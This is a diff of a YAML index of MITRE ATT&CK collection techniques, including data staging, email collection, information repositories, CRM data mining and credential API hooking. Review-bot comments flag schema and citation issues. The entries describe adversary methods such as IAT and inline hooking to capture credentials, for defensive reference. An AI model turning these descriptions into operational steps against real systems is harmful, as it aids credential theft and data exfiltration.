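Review bot: the platform list for Email Forwarding Rule replaces `Office 365` and `Google Workspace` with the single value `Office Suite` (Remote Email Collection gets the same change below). Anything that partitions techniques by platform name, such as a per-platform index, needs `Office Suite` mapped to the old buckets, or these techniques silently vanish from the Office 365 and Google Workspace views. The added `Cloud Service: Cloud Service Metadata` data source is consistent with that consolidation.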
@@ -41891,70 +42447,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
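Review bot: the Mandiant M-Trends 2020 reference is repointed from the retired `content.fireeye.com` host to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, which is the right fix, but the PwC Cloud Hopper reference keeps the malformed archive URL `https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/...` (single slash after `https:`) in both the removed and the added line. Wayback tolerates it, but since this hunk already rewrites the whole `external_references` block for T1074 it is a cheap place to fix the scheme, or to note that the value is carried verbatim from upstream.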
@@ -42027,7 +42579,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -42082,12 +42633,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -42099,6 +42649,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -42106,11 +42659,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42127,14 +42680,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -42150,6 +42700,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -42158,13 +42709,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -42172,15 +42723,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -42191,9 +42738,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
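Review bot: the new T1213.004 (Customer Relationship Management Software) entry is inserted between T1056 and T1557.002, which is STIX UUID order (`bb5a00de...` before `bbfbb096...`) rather than technique-ID order, consistent with the rest of the file. It ships with `x_mitre_detection: ''` and `atomic_tests: []`; make sure the index-building code treats an empty detection string the same as a missing field rather than emitting a blank detection column.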
@@ -42239,7 +42837,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -42258,37 +42856,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42311,41 +42908,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
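Review bot: Splitting the T1213 contributor entry 'Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)' into 'Naveen Vijayaraghavan' and 'Nilesh Dherange (Gurucul)' drops the Gurucul affiliation from the first name; confirm against upstream whether the first entry should read 'Naveen Vijayaraghavan (Gurucul)'. Separately, this hunk is the first place the diff removes `spec_version: '2.1'` while bumping `x_mitre_attack_spec_version` to 3.2.0, and the same removal repeats on every technique below. If anything downstream treats these technique blocks as STIX 2.1 objects, `spec_version` is a required common property there, so confirm the generator omits it deliberately rather than as a side effect of the upstream schema change.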
@@ -42374,10 +42982,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
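Review bot: Replacing the 'Office 365' and 'Google Workspace' platforms with a single 'Office Suite' entry changes which platform-filtered views this technique lands in, and the new entry is appended after 'IaaS' rather than placed where 'Office 365' sat. Anything that selects techniques by the old platform strings will silently stop matching T1213, so confirm that every consumer of the platform field is updated in the same change.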
@@ -42390,10 +42997,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -42402,11 +43019,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
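Review bot: The new 'Cybernews Reuters Leak 2022' reference has a stray space before the period in the author field ('Vilius Petkauskas .'); trim it to 'Vilius Petkauskas.' so the description formats like the other citations. The source_name does match the '(Citation: Cybernews Reuters Leak 2022)' tag in the updated T1213 description above, so the cross-reference resolves.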
@@ -42443,7 +43063,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
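Review bot: The T1602.001 `modified` timestamp moves backwards, from '2021-04-29T14:49:39.188Z' to '2020-10-22T01:54:22.812Z'. A modified time should not regress on a regenerated object, so confirm this reflects the upstream object's actual timestamp; the same 2021-04-29T14:49:39.188Z value is replaced on T1563.001 further down this diff, which suggests the old value was a bulk-touch timestamp rather than a real edit date.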
@@ -42475,115 +43095,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
